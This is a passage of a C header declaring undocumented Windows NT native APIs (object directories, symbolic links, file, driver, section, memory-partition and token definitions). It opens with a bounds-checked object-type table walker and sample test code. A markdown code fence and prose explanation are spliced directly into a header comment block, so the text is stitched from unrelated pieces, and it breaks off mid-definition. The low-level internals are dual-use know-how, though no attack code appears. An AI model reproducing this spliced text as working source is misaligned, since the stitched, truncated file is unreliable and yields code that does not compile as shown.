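    size_t off = ALIGN_UP_PTR(sizeof(OBJ_TYPES_INFO));        /* OBJECT_TYPES_FIRST_ENTRY */
    ULONG count, i;

    if (len < sizeof(OBJ_TYPES_INFO)) return -1;
    count = ((const OBJ_TYPES_INFO *)buf)->NumberOfTypes;
    for (i = 0; i < count; i++) {
        const OBJ_TYPE_INFO *e;
        const WCHAR *name;
        size_t n, j;
        if (off + sizeof(OBJ_TYPE_INFO) > len) return -1;        /* entry truncated */
        e = (const OBJ_TYPE_INFO *)(base + off);
        if ((e->TypeName.Length & 1) || e->TypeName.Length > e->TypeName.MaximumLength ||
            off + sizeof(OBJ_TYPE_INFO) + e->TypeName.MaximumLength > len)
            return -1;                                           /* name truncated */
        name = (const WCHAR *)(e + 1);
        n = e->TypeName.Length / sizeof(WCHAR);
        for (j = 0; j < n && ascii[j] != '\0' && name[j] == (WCHAR)(unsigned char)ascii[j]; j++) {}
        if (j == n && ascii[j] == '\0') return e->TypeIndex;
        off += sizeof(OBJ_TYPE_INFO) + ALIGN_UP_PTR(e->TypeName.MaximumLength); /* NEXT_ENTRY */
    }
    return -1;
}

/* Constructed sample (not real kernel output) in the kernel's layout: count header, then each
 * entry immediately followed by its name, next entry pointer-aligned. Names/indices are made up. */
size_t BuildSampleTypes(uint8_t *out, size_t cap)
{
    static const char *const names[] = { "Type", "Process", "Token" };
    static const UCHAR tidx[] = { 2, 7, 5 };
    size_t off = ALIGN_UP_PTR(sizeof(OBJ_TYPES_INFO)), k, j;

    if (cap < off) return 0;
    memset(out, 0, cap);
    ((OBJ_TYPES_INFO *)out)->NumberOfTypes = 3;
    for (k = 0; k < 3; k++) {
        OBJ_TYPE_INFO e;
        size_t n = strlen(names[k]);
        size_t need = sizeof(e) + ALIGN_UP_PTR((n + 1) * sizeof(WCHAR));
        WCHAR *name = (WCHAR *)(out + off + sizeof(e));
        if (off + need > cap) return 0;
        memset(&e, 0, sizeof(e));
        e.TypeName.Length = (USHORT)(n * sizeof(WCHAR));
        e.TypeName.MaximumLength = (USHORT)((n + 1) * sizeof(WCHAR));
        e.TypeName.Buffer = name;
        e.TypeIndex = tidx[k];
        memcpy(out + off, &e, sizeof(e));
        for (j = 0; j < n; j++) name[j] = (WCHAR)names[k][j];
        off += need;
    }
    return off;
}

/* Look `name` up in the sample while claiming the buffer is `shrink` bytes shorter than it is:
 * SampleLookup("Process", 0) is 7; SampleLookup("Token", 8) is -1 because the last entry no
 * longer fits, instead of a read past the end. */
int SampleLookup(const char *name, size_t shrink)
{
    ULONG_PTR raw[96];                                   /* pointer-aligned backing store */
    size_t n = BuildSampleTypes((uint8_t *)raw, sizeof(raw));
    return (n == 0 || shrink > n) ? -2 : FindTypeIndex(raw, n - shrink, name);
}

#ifdef _WIN32
#ifndef STATUS_INFO_LENGTH_MISMATCH
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
#endif
typedef NTSTATUS (NTAPI *pfnNtQueryObject)(HANDLE, OBJECT_INFORMATION_CLASS, PVOID, ULONG, PULONG);

/* Live query: NULL handle with class 3 (ObjectTypesInformation) returns every object type. */
int main(void)
{
    pfnNtQueryObject query = (pfnNtQueryObject)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtQueryObject");
    ULONG cap = 0x1000, ret = 0;
    NTSTATUS st = STATUS_INFO_LENGTH_MISMATCH;
    void *buf = NULL;
    if (!query) return 1;
    while (st == STATUS_INFO_LENGTH_MISMATCH) {           /* grow until the whole table fits */
        free(buf);
        if ((buf = malloc(cap)) == NULL) return 1;
        st = query(NULL, (OBJECT_INFORMATION_CLASS)3, buf, cap, &ret);
        if (st == STATUS_INFO_LENGTH_MISMATCH) cap = ret > cap ? ret : cap * 2;
    }
    if (st == 0) printf("Process type index %d, Token %d\n",
                        FindTypeIndex(buf, cap, "Process"), FindTypeIndex(buf, cap, "Token"));
    free(buf);
    return st == 0 ? 0 : 1;
}
#endif
```

`OBJECT_TYPE_INFORMATION` and `OBJECT_TYPE_INFORMATION_V2` have the same size (`TypeIndex` and `ReservedByte` occupy what was padding after the two `BOOLEAN`s), so the page's `OBJECT_TYPES_NEXT_ENTRY`, which uses `sizeof(OBJECT_TYPE_INFORMATION)`, steps correctly over either layout; the walker relies on the same fact. The length passed to `FindTypeIndex` must be the size the kernel actually wrote into, never a caller-side guess, which is why the live path grows the allocation until the status is no longer `STATUS_INFO_LENGTH_MISMATCH` before walking it.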
 * ************************************************************************************/

#define OBJDIR_FLAG_SHADOW_PRESENT 0x4
#define OBJDIR_FLAG_SANDBOX 0x10

NTSYSAPI NTSTATUS NTAPI NtCreateDirectoryObject(
    _Out_ PHANDLE DirectoryHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_ POBJECT_ATTRIBUTES ObjectAttributes);

NTSYSAPI NTSTATUS NTAPI NtCreateDirectoryObjectEx(
    _Out_ PHANDLE DirectoryHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_ POBJECT_ATTRIBUTES ObjectAttributes,
    _In_ HANDLE ShadowDirectoryHandle,
    _In_ ULONG Flags);

NTSYSAPI NTSTATUS NTAPI NtOpenDirectoryObject(
    _Out_ PHANDLE DirectoryHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_ POBJECT_ATTRIBUTES ObjectAttributes);

NTSYSAPI NTSTATUS NTAPI NtQueryDirectoryObject(
    _In_ HANDLE DirectoryHandle,
    _Out_writes_bytes_opt_(Length) PVOID Buffer,
    _In_ ULONG Length,
    _In_ BOOLEAN ReturnSingleEntry,
    _In_ BOOLEAN RestartScan,
    _Inout_ PULONG Context,
    _Out_opt_ PULONG ReturnLength);

/************************************************************************************
 *
 * Private Namespace API.
 *
 ************************************************************************************/

NTSYSAPI NTSTATUS NTAPI NtCreatePrivateNamespace(
    _Out_ PHANDLE NamespaceHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_ POBJECT_ATTRIBUTES ObjectAttributes,
    _In_ PVOID BoundaryDescriptor);

NTSYSAPI NTSTATUS NTAPI NtOpenPrivateNamespace(
    _Out_ PHANDLE NamespaceHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
    _In_ PVOID BoundaryDescriptor);

NTSYSAPI NTSTATUS NTAPI NtDeletePrivateNamespace(
    _In_ HANDLE NamespaceHandle);

/************************************************************************************
 *
 * Symbolic Link API.
* ************************************************************************************/ typedef enum _SYMBOLIC_LINK_INFO_CLASS { SymbolicLinkGlobalInformation = 1, SymbolicLinkAccessMask, MaxnSymbolicLinkInfoClass } SYMBOLIC_LINK_INFO_CLASS; typedef struct _OBJECT_SYMBOLIC_LINK_V1 { //pre Win10 TH1 LARGE_INTEGER CreationTime; UNICODE_STRING LinkTarget; ULONG DosDeviceDriveIndex; } OBJECT_SYMBOLIC_LINK_V1, *POBJECT_SYMBOLIC_LINK_V1; typedef struct _OBJECT_SYMBOLIC_LINK_V2 { //Win10 TH1/TH2 LARGE_INTEGER CreationTime; UNICODE_STRING LinkTarget; ULONG DosDeviceDriveIndex; ULONG Flags; } OBJECT_SYMBOLIC_LINK_V2, *POBJECT_SYMBOLIC_LINK_V2; typedef struct _OBJECT_SYMBOLIC_LINK_V3 { //Win10 RS1 LARGE_INTEGER CreationTime; UNICODE_STRING LinkTarget; ULONG DosDeviceDriveIndex; ULONG Flags; ULONG AccessMask; } OBJECT_SYMBOLIC_LINK_V3, *POBJECT_SYMBOLIC_LINK_V3; typedef struct _OBJECT_SYMBOLIC_LINK_V4 { //Win10 RS2+ LARGE_INTEGER CreationTime; union { UNICODE_STRING LinkTarget; struct { PVOID Callback; PVOID CallbackContext; }; } u1; ULONG DosDeviceDriveIndex; ULONG Flags; ULONG AccessMask; //long __PADDING__[1]; } OBJECT_SYMBOLIC_LINK_V4, *POBJECT_SYMBOLIC_LINK_V4; /* size: 0x0028 */ typedef struct _OBJECT_SYMBOLIC_LINK_V5 { //Win10 21H1+ LARGE_INTEGER CreationTime; union { UNICODE_STRING LinkTarget; struct { PVOID Callback; PVOID CallbackContext; }; } u1; ULONG DosDeviceDriveIndex; ULONG Flags; ULONG AccessMask; ULONG IntegrityLevel; } OBJECT_SYMBOLIC_LINK_V5, * POBJECT_SYMBOLIC_LINK_V5; /* size: 0x0028 */ NTSYSAPI NTSTATUS NTAPI NtCreateSymbolicLinkObject( _Out_ PHANDLE LinkHandle, _In_ ACCESS_MASK DesiredAccess, _In_ POBJECT_ATTRIBUTES ObjectAttributes, _In_ PUNICODE_STRING LinkTarget); NTSYSAPI NTSTATUS WINAPI NtOpenSymbolicLinkObject( _Out_ PHANDLE LinkHandle, _In_ ACCESS_MASK DesiredAccess, _In_ POBJECT_ATTRIBUTES ObjectAttributes); NTSYSAPI NTSTATUS NTAPI NtQuerySymbolicLinkObject( _In_ HANDLE LinkHandle, _Inout_ PUNICODE_STRING LinkTarget, _Out_opt_ PULONG 
ReturnedLength); NTSTATUS NTAPI NtSetInformationSymbolicLink( _In_ HANDLE LinkHandle, _In_ SYMBOLIC_LINK_INFO_CLASS SymbolicLinkInformationClass, _In_reads_bytes_(SymbolicLinkInformationLength) PVOID SymbolicLinkInformation, _In_ ULONG SymbolicLinkInformationLength); /************************************************************************************ * * File API (+Driver&HotPatch). * ************************************************************************************/ NTSYSAPI NTSTATUS NTAPI NtCreateFile( _Out_ PHANDLE FileHandle, _In_ ACCESS_MASK DesiredAccess, _In_ POBJECT_ATTRIBUTES ObjectAttributes, _Out_ PIO_STATUS_BLOCK IoStatusBlock, _In_opt_ PLARGE_INTEGER AllocationSize, _In_ ULONG FileAttributes, _In_ ULONG ShareAccess, _In_ ULONG CreateDisposition, _In_ ULONG CreateOptions, _In_reads_bytes_opt_(EaLength) PVOID EaBuffer, _In_ ULONG EaLength); NTSYSAPI NTSTATUS NTAPI NtCreateNamedPipeFile( _Out_ PHANDLE FileHandle, _In_ ULONG DesiredAccess, _In_ POBJECT_ATTRIBUTES ObjectAttributes, _Out_ PIO_STATUS_BLOCK IoStatusBlock, _In_ ULONG ShareAccess, _In_ ULONG CreateDisposition, _In_ ULONG CreateOptions, _In_ ULONG NamedPipeType, _In_ ULONG ReadMode, _In_ ULONG CompletionMode, _In_ ULONG MaximumInstances, _In_ ULONG InboundQuota, _In_ ULONG OutboundQuota, _In_opt_ PLARGE_INTEGER DefaultTimeout); NTSYSAPI NTSTATUS NTAPI NtCreateMailslotFile( _Out_ PHANDLE FileHandle, _In_ ULONG DesiredAccess, _In_ POBJECT_ATTRIBUTES ObjectAttributes, _Out_ PIO_STATUS_BLOCK IoStatusBlock, _In_ ULONG CreateOptions, _In_ ULONG MailslotQuota, _In_ ULONG MaximumMessageSize, _In_ PLARGE_INTEGER ReadTimeout); NTSYSAPI NTSTATUS NTAPI NtDeviceIoControlFile( _In_ HANDLE FileHandle, _In_opt_ HANDLE Event, _In_opt_ PIO_APC_ROUTINE ApcRoutine, _In_opt_ PVOID ApcContext, _Out_ PIO_STATUS_BLOCK IoStatusBlock, _In_ ULONG IoControlCode, _In_reads_bytes_opt_(InputBufferLength) PVOID InputBuffer, _In_ ULONG InputBufferLength, _Out_writes_bytes_opt_(OutputBufferLength) PVOID OutputBuffer, _In_ 
ULONG OutputBufferLength); NTSYSAPI NTSTATUS NTAPI NtFsControlFile( _In_ HANDLE FileHandle, _In_opt_ HANDLE Event, _In_opt_ PIO_APC_ROUTINE ApcRoutine, _In_opt_ PVOID ApcContext, _Out_ PIO_STATUS_BLOCK IoStatusBlock, _In_ ULONG FsControlCode, _In_reads_bytes_opt_(InputBufferLength) PVOID InputBuffer, _In_ ULONG InputBufferLength, _Out_writes_bytes_opt_(OutputBufferLength) PVOID OutputBuffer, _In_ ULONG OutputBufferLength); NTSYSAPI NTSTATUS NTAPI NtOpenFile( _Out_ PHANDLE FileHandle, _In_ ACCESS_MASK DesiredAccess, _In_ POBJECT_ATTRIBUTES ObjectAttributes, _Out_ PIO_STATUS_BLOCK IoStatusBlock, _In_ ULONG ShareAccess, _In_ ULONG OpenOptions); NTSYSAPI NTSTATUS NTAPI NtReadFile( _In_ HANDLE FileHandle, _In_opt_ HANDLE Event, _In_opt_ PIO_APC_ROUTINE ApcRoutine, _In_opt_ PVOID ApcContext, _Out_ PIO_STATUS_BLOCK IoStatusBlock, _Out_writes_bytes_(Length) PVOID Buffer, _In_ ULONG Length, _In_opt_ PLARGE_INTEGER ByteOffset, _In_opt_ PULONG Key); NTSYSAPI NTSTATUS NTAPI NtWriteFile( _In_ HANDLE FileHandle, _In_opt_ HANDLE Event, _In_opt_ PIO_APC_ROUTINE ApcRoutine, _In_opt_ PVOID ApcContext, _Out_ PIO_STATUS_BLOCK IoStatusBlock, _In_reads_bytes_(Length) PVOID Buffer, _In_ ULONG Length, _In_opt_ PLARGE_INTEGER ByteOffset, _In_opt_ PULONG Key); NTSYSAPI NTSTATUS NTAPI NtLockFile( _In_ HANDLE FileHandle, _In_opt_ HANDLE Event, _In_opt_ PIO_APC_ROUTINE ApcRoutine, _In_opt_ PVOID ApcContext, _Out_ PIO_STATUS_BLOCK IoStatusBlock, _In_ PLARGE_INTEGER ByteOffset, _In_ PLARGE_INTEGER Length, _In_ ULONG Key, _In_ BOOLEAN FailImmediately, _In_ BOOLEAN ExclusiveLock); NTSYSAPI NTSTATUS NTAPI NtUnlockFile( _In_ HANDLE FileHandle, _Out_ PIO_STATUS_BLOCK IoStatusBlock, _In_ PLARGE_INTEGER ByteOffset, _In_ PLARGE_INTEGER Length, _In_ ULONG Key); NTSYSAPI NTSTATUS NTAPI NtFlushBuffersFile( _In_ HANDLE FileHandle, _Out_ PIO_STATUS_BLOCK IoStatusBlock); NTSYSAPI NTSTATUS NTAPI NtSetInformationFile( _In_ HANDLE FileHandle, _Out_ PIO_STATUS_BLOCK IoStatusBlock, _In_ PVOID FileInformation, _In_ 
ULONG Length, _In_ FILE_INFORMATION_CLASS FileInformationClass); NTSYSAPI NTSTATUS NTAPI NtDeleteFile( _In_ POBJECT_ATTRIBUTES ObjectAttributes); NTSYSAPI NTSTATUS NTAPI NtQueryInformationFile( _In_ HANDLE FileHandle, _Out_ PIO_STATUS_BLOCK IoStatusBlock, _Out_writes_bytes_(Length) PVOID FileInformation, _In_ ULONG Length, _In_ FILE_INFORMATION_CLASS FileInformationClass); NTSYSAPI NTSTATUS NTAPI NtQueryFullAttributesFile( _In_ POBJECT_ATTRIBUTES ObjectAttributes, _Out_ PFILE_NETWORK_OPEN_INFORMATION FileInformation); NTSYSAPI NTSTATUS NTAPI NtQueryDirectoryFile( _In_ HANDLE FileHandle, _In_opt_ HANDLE Event, _In_opt_ PIO_APC_ROUTINE ApcRoutine, _In_opt_ PVOID ApcContext, _Out_ PIO_STATUS_BLOCK IoStatusBlock, _Out_writes_bytes_(Length) PVOID FileInformation, _In_ ULONG Length, _In_ FILE_INFORMATION_CLASS FileInformationClass, _In_ BOOLEAN ReturnSingleEntry, _In_opt_ PUNICODE_STRING FileName, _In_ BOOLEAN RestartScan); NTSYSAPI NTSTATUS NTAPI NtQueryDirectoryFileEx( _In_ HANDLE FileHandle, _In_opt_ HANDLE Event, _In_opt_ PIO_APC_ROUTINE ApcRoutine, _In_opt_ PVOID ApcContext, _Out_ PIO_STATUS_BLOCK IoStatusBlock, _Out_writes_bytes_(Length) PVOID FileInformation, _In_ ULONG Length, _In_ FILE_INFORMATION_CLASS FileInformationClass, _In_ ULONG QueryFlags, _In_opt_ PUNICODE_STRING FileName); NTSYSAPI NTSTATUS NTAPI NtQueryEaFile( _In_ HANDLE FileHandle, _Out_ PIO_STATUS_BLOCK IoStatusBlock, _Out_writes_bytes_(Length) PVOID Buffer, _In_ ULONG Length, _In_ BOOLEAN ReturnSingleEntry, _In_reads_bytes_opt_(EaListLength) PVOID EaList, _In_ ULONG EaListLength, _In_opt_ PULONG EaIndex, _In_ BOOLEAN RestartScan); NTSYSAPI NTSTATUS NTAPI NtSetEaFile( _In_ HANDLE FileHandle, _Out_ PIO_STATUS_BLOCK IoStatusBlock, _In_bytecount_(Length) PVOID Buffer, _In_ ULONG Length); NTSYSAPI NTSTATUS NTAPI NtQueryVolumeInformationFile( _In_ HANDLE FileHandle, _Out_ PIO_STATUS_BLOCK IoStatusBlock, _Out_writes_bytes_(Length) PVOID FsInformation, _In_ ULONG Length, _In_ FS_INFORMATION_CLASS 
FsInformationClass); NTSYSAPI NTSTATUS NTAPI NtQueryQuotaInformationFile( _In_ HANDLE FileHandle, _Out_ PIO_STATUS_BLOCK IoStatusBlock, _Out_writes_bytes_(Length) PVOID Buffer, _In_ ULONG Length, _In_ BOOLEAN ReturnSingleEntry, _In_reads_bytes_opt_(SidListLength) PVOID SidList, _In_ ULONG SidListLength, _In_opt_ PSID StartSid, _In_ BOOLEAN RestartScan); NTSYSAPI NTSTATUS NTAPI NtSetQuotaInformationFile( _In_ HANDLE FileHandle, _Out_ PIO_STATUS_BLOCK IoStatusBlock, _In_reads_bytes_(Length) PVOID Buffer, _In_ ULONG Length); NTSYSAPI NTSTATUS NTAPI NtReadFileScatter( _In_ HANDLE FileHandle, _In_opt_ HANDLE Event, _In_opt_ PIO_APC_ROUTINE ApcRoutine, _In_opt_ PVOID ApcContext, _Out_ PIO_STATUS_BLOCK IoStatusBlock, _In_ PFILE_SEGMENT_ELEMENT SegmentArray, _In_ ULONG Length, _In_opt_ PLARGE_INTEGER ByteOffset, _In_opt_ PULONG Key); NTSYSAPI NTSTATUS NTAPI NtWriteFileGather( _In_ HANDLE FileHandle, _In_opt_ HANDLE Event, _In_opt_ PIO_APC_ROUTINE ApcRoutine, _In_opt_ PVOID ApcContext, _Out_ PIO_STATUS_BLOCK IoStatusBlock, _In_ PFILE_SEGMENT_ELEMENT SegmentArray, _In_ ULONG Length, _In_opt_ PLARGE_INTEGER ByteOffset, _In_opt_ PULONG Key); NTSYSAPI NTSTATUS NTAPI NtNotifyChangeDirectoryFile( _In_ HANDLE FileHandle, _In_opt_ HANDLE Event, _In_opt_ PIO_APC_ROUTINE ApcRoutine, _In_opt_ PVOID ApcContext, _Out_ PIO_STATUS_BLOCK IoStatusBlock, _Out_writes_bytes_(Length) PVOID Buffer, _In_ ULONG Length, _In_ ULONG CompletionFilter, _In_ BOOLEAN WatchTree); NTSYSAPI NTSTATUS NTAPI NtCopyFileChunk( _In_ HANDLE SourceHandle, _In_ HANDLE DestinationHandle, _In_opt_ HANDLE EventHandle, _Out_ PIO_STATUS_BLOCK IoStatusBlock, _In_ ULONG Length, _In_ PLARGE_INTEGER SourceOffset, _In_ PLARGE_INTEGER DestOffset, _In_opt_ PULONG SourceKey, _In_opt_ PULONG DestKey, _In_ ULONG Flags); NTSYSAPI NTSTATUS NTAPI NtLoadDriver( _In_ PUNICODE_STRING DriverServiceName); NTSYSAPI NTSTATUS NTAPI NtUnloadDriver( _In_ PUNICODE_STRING DriverServiceName); NTSYSAPI NTSTATUS NTAPI NtLoadHotPatch( _In_ 
PUNICODE_STRING HotPatchName, _Reserved_ ULONG LoadFlag); NTSYSAPI NTSTATUS NTAPI NtManageHotPatch( _In_ ULONG HotPatchInformationClass, _Out_writes_bytes_opt_(HotPatchInformationLength) PVOID HotPatchInformation, _In_ ULONG HotPatchInformationLength, _Out_opt_ PULONG ReturnLength); /************************************************************************************ * * Section API (+MemoryPartitions). * ************************************************************************************/ #define MEM_EXECUTE_OPTION_ENABLE 0x1 #define MEM_EXECUTE_OPTION_DISABLE 0x2 #define MEM_EXECUTE_OPTION_DISABLE_THUNK_EMULATION 0x4 #define MEM_EXECUTE_OPTION_PERMANENT 0x8 #define MEM_EXECUTE_OPTION_EXECUTE_DISPATCH_ENABLE 0x10 #define MEM_EXECUTE_OPTION_IMAGE_DISPATCH_ENABLE 0x20 #define MEM_EXECUTE_OPTION_VALID_FLAGS 0x3f typedef enum _MEMORY_PARTITION_INFORMATION_CLASS { SystemMemoryPartitionInformation, SystemMemoryPartitionMoveMemory, SystemMemoryPartitionAddPagefile, SystemMemoryPartitionCombineMemory, SystemMemoryPartitionInitialAddMemory, SystemMemoryPartitionGetMemoryEvents, SystemMemoryPartitionSetAttributes, SystemMemoryPartitionNodeInformation, SystemMemoryPartitionCreateLargePages, SystemMemoryPartitionDedicatedMemoryInformation, SystemMemoryPartitionOpenDedicatedMemory, SystemMemoryPartitionMemoryChargeAttributes, SystemMemoryPartitionClearAttributes, SystemMemoryPartitionSetMemoryThresholds, SystemMemoryPartitionMemoryListCommand, SystemMemoryPartitionMax } MEMORY_PARTITION_INFORMATION_CLASS; typedef struct _MEMORY_PARTITION_PAGE_RANGE { ULONG_PTR StartPage; ULONG_PTR NumberOfPages; } MEMORY_PARTITION_PAGE_RANGE, *PMEMORY_PARTITION_PAGE_RANGE; typedef struct _MEMORY_PARTITION_INITIAL_ADD_INFORMATION { ULONG Flags; ULONG NumberOfRanges; ULONG_PTR NumberOfPagesAdded; MEMORY_PARTITION_PAGE_RANGE PartitionRanges[1]; } MEMORY_PARTITION_INITIAL_ADD_INFORMATION, *PMEMORY_PARTITION_INITIAL_ADD_INFORMATION; typedef struct _MEMORY_PARTITION_PAGE_COMBINE_INFORMATION { PVOID 
StopHandle; ULONG Flags; ULONG_PTR TotalNumberOfPages; } MEMORY_PARTITION_PAGE_COMBINE_INFORMATION, *PMEMORY_PARTITION_PAGE_COMBINE_INFORMATION; typedef struct _MEMORY_PARTITION_PAGEFILE_INFORMATION { UNICODE_STRING PageFileName; LARGE_INTEGER MinimumSize; LARGE_INTEGER MaximumSize; ULONG Flags; } MEMORY_PARTITION_PAGEFILE_INFORMATION, *PMEMORY_PARTITION_PAGEFILE_INFORMATION; typedef struct _MEMORY_PARTITION_TRANSFER_INFORMATION { ULONG_PTR NumberOfPages; ULONG NumaNode; ULONG Flags; } MEMORY_PARTITION_TRANSFER_INFORMATION, *PMEMORY_PARTITION_TRANSFER_INFORMATION; typedef struct _MEMORY_PARTITION_CONFIGURATION_INFORMATION { ULONG Flags; ULONG NumaNode; ULONG Channel; ULONG NumberOfNumaNodes; ULONG_PTR ResidentAvailablePages; ULONG_PTR CommittedPages; ULONG_PTR CommitLimit; ULONG_PTR PeakCommitment; ULONG_PTR TotalNumberOfPages; ULONG_PTR AvailablePages; ULONG_PTR ZeroPages; ULONG_PTR FreePages; ULONG_PTR StandbyPages; // Fields added RS1+ ULONG_PTR StandbyPageCountByPriority[8]; ULONG_PTR RepurposedPagesByPriority[8]; ULONG_PTR MaximumCommitLimit; ULONG_PTR DonatedPagesToPartitions; ULONG PartitionId; } MEMORY_PARTITION_CONFIGURATION_INFORMATION, * PMEMORY_PARTITION_CONFIGURATION_INFORMATION; NTSYSAPI NTSTATUS NTAPI NtCreateSection( _Out_ PHANDLE SectionHandle, _In_ ACCESS_MASK DesiredAccess, _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, _In_opt_ PLARGE_INTEGER MaximumSize, _In_ ULONG SectionPageProtection, _In_ ULONG AllocationAttributes, _In_opt_ HANDLE FileHandle); //taken from ph2 NTSYSAPI NTSTATUS NTAPI NtCreateSectionEx( _Out_ PHANDLE SectionHandle, _In_ ACCESS_MASK DesiredAccess, _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, _In_opt_ PLARGE_INTEGER MaximumSize, _In_ ULONG SectionPageProtection, _In_ ULONG AllocationAttributes, _In_opt_ HANDLE FileHandle, _Inout_updates_opt_(ExtendedParameterCount) PMEM_EXTENDED_PARAMETER ExtendedParameters, _In_ ULONG ExtendedParameterCount); NTSYSAPI NTSTATUS NTAPI NtOpenSection( _Out_ PHANDLE SectionHandle, _In_ 
ACCESS_MASK DesiredAccess,
    _In_ POBJECT_ATTRIBUTES ObjectAttributes);

NTSYSAPI
NTSTATUS
NTAPI
NtMapViewOfSection(
    _In_ HANDLE SectionHandle,
    _In_ HANDLE ProcessHandle,
    _Inout_ _At_(*BaseAddress, _Readable_bytes_(*ViewSize) _Writable_bytes_(*ViewSize) _Post_readable_byte_size_(*ViewSize)) PVOID *BaseAddress,
    _In_ ULONG_PTR ZeroBits,
    _In_ SIZE_T CommitSize,
    _Inout_opt_ PLARGE_INTEGER SectionOffset,
    _Inout_ PSIZE_T ViewSize,
    _In_ SECTION_INHERIT InheritDisposition,
    _In_ ULONG AllocationType,
    _In_ ULONG Win32Protect);

//taken from ph2
NTSYSAPI
NTSTATUS
NTAPI
NtMapViewOfSectionEx(
    _In_ HANDLE SectionHandle,
    _In_ HANDLE ProcessHandle,
    _Inout_ _At_(*BaseAddress, _Readable_bytes_(*ViewSize) _Writable_bytes_(*ViewSize) _Post_readable_byte_size_(*ViewSize)) PVOID* BaseAddress,
    _Inout_opt_ PLARGE_INTEGER SectionOffset,
    _Inout_ PSIZE_T ViewSize,
    _In_ ULONG AllocationType,
    _In_ ULONG Win32Protect,
    _Inout_updates_opt_(ExtendedParameterCount) PMEM_EXTENDED_PARAMETER ExtendedParameters,
    _In_ ULONG ExtendedParameterCount);

NTSYSAPI
NTSTATUS
NTAPI
NtUnmapViewOfSection(
    _In_ HANDLE ProcessHandle,
    _In_opt_ PVOID BaseAddress);

NTSYSAPI
NTSTATUS
NTAPI
NtUnmapViewOfSectionEx(
    _In_ HANDLE ProcessHandle,
    _In_opt_ PVOID BaseAddress,
    _In_ ULONG Flags);

NTSYSAPI
NTSTATUS
NTAPI
NtQuerySection(
    _In_ HANDLE SectionHandle,
    _In_ SECTION_INFORMATION_CLASS SectionInformationClass,
    _Out_writes_bytes_(SectionInformationLength) PVOID SectionInformation,
    _In_ SIZE_T SectionInformationLength,
    _Out_opt_ PSIZE_T ReturnLength);

NTSYSAPI
NTSTATUS
NTAPI
NtExtendSection(
    _In_ HANDLE SectionHandle,
    _Inout_ PLARGE_INTEGER NewSectionSize);

NTSYSAPI
NTSTATUS
NTAPI
NtMapUserPhysicalPages(
    _In_ PVOID VirtualAddress,
    _In_ ULONG_PTR NumberOfPages,
    _In_reads_opt_(NumberOfPages) PULONG_PTR UserPfnArray);

NTSYSAPI
NTSTATUS
NTAPI
NtMapUserPhysicalPagesScatter(
    _In_reads_(NumberOfPages) PVOID *VirtualAddresses,
    _In_ ULONG_PTR NumberOfPages,
    _In_reads_opt_(NumberOfPages) PULONG_PTR UserPfnArray);

NTSYSAPI
NTSTATUS
NTAPI
NtAllocateUserPhysicalPages(
    _In_ HANDLE ProcessHandle,
    _Inout_ PULONG_PTR NumberOfPages,
    _Out_writes_(*NumberOfPages) PULONG_PTR UserPfnArray);

NTSYSAPI
NTSTATUS
NTAPI
NtFreeUserPhysicalPages(
    _In_ HANDLE ProcessHandle,
    _Inout_ PULONG_PTR NumberOfPages,
    _In_reads_(*NumberOfPages) PULONG_PTR UserPfnArray);

NTSYSAPI
NTSTATUS
NTAPI
NtAreMappedFilesTheSame(
    _In_ PVOID File1MappedAsAnImage,
    _In_ PVOID File2MappedAsFile);

//
// NtCreatePartition
//

//
// 10248
//
typedef NTSTATUS(NTAPI* pfnNtCreatePartitionV1)(
    _Out_ PHANDLE PartitionHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
    _In_ ULONG PreferredNode);

//
// 10586
//
typedef NTSTATUS(NTAPI* pfnNtCreatePartitionV2)(
    _In_ HANDLE ParentPartitionHandle,
    _Out_ HANDLE* PartitionHandle,
    _In_ ULONG DesiredAccess,
    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
    _In_ ULONG Node);

//
// Actual NtCreatePartition definition since Win10 10586
//
NTSYSAPI
NTSTATUS
NTAPI
NtCreatePartition(
    _In_ HANDLE ParentPartitionHandle,
    _Out_ HANDLE* PartitionHandle,
    _In_ ULONG DesiredAccess,
    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
    _In_ ULONG Node);

NTSYSAPI
NTSTATUS
NTAPI
NtOpenPartition(
    _Out_ PHANDLE PartitionHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_ POBJECT_ATTRIBUTES ObjectAttributes);

NTSYSAPI
NTSTATUS
NTAPI
NtManagePartition(
    _In_ HANDLE TargetHandle,
    _In_opt_ HANDLE SourceHandle,
    _In_ MEMORY_PARTITION_INFORMATION_CLASS PartitionInformationClass,
    _Inout_updates_bytes_(PartitionInformationLength) PVOID PartitionInformation,
    _In_ ULONG PartitionInformationLength);

/************************************************************************************
*
* Token API.
*
************************************************************************************/

//
// This part is taken from PH ntseapi.h.
//

// Types
#define TOKEN_SECURITY_ATTRIBUTE_TYPE_INVALID 0x00
#define TOKEN_SECURITY_ATTRIBUTE_TYPE_INT64 0x01
#define TOKEN_SECURITY_ATTRIBUTE_TYPE_UINT64 0x02
#define TOKEN_SECURITY_ATTRIBUTE_TYPE_STRING 0x03
#define TOKEN_SECURITY_ATTRIBUTE_TYPE_FQBN 0x04
#define TOKEN_SECURITY_ATTRIBUTE_TYPE_SID 0x05
#define TOKEN_SECURITY_ATTRIBUTE_TYPE_BOOLEAN 0x06
#define TOKEN_SECURITY_ATTRIBUTE_TYPE_OCTET_STRING 0x10

// Flags
#define TOKEN_SECURITY_ATTRIBUTE_NON_INHERITABLE 0x0001
#define TOKEN_SECURITY_ATTRIBUTE_VALUE_CASE_SENSITIVE 0x0002
#define TOKEN_SECURITY_ATTRIBUTE_USE_FOR_DENY_ONLY 0x0004
#define TOKEN_SECURITY_ATTRIBUTE_DISABLED_BY_DEFAULT 0x0008
#define TOKEN_SECURITY_ATTRIBUTE_DISABLED 0x0010
#define TOKEN_SECURITY_ATTRIBUTE_MANDATORY 0x0020
#define TOKEN_SECURITY_ATTRIBUTE_COMPARE_IGNORE 0x0040

#define TOKEN_SECURITY_ATTRIBUTE_VALID_FLAGS ( \
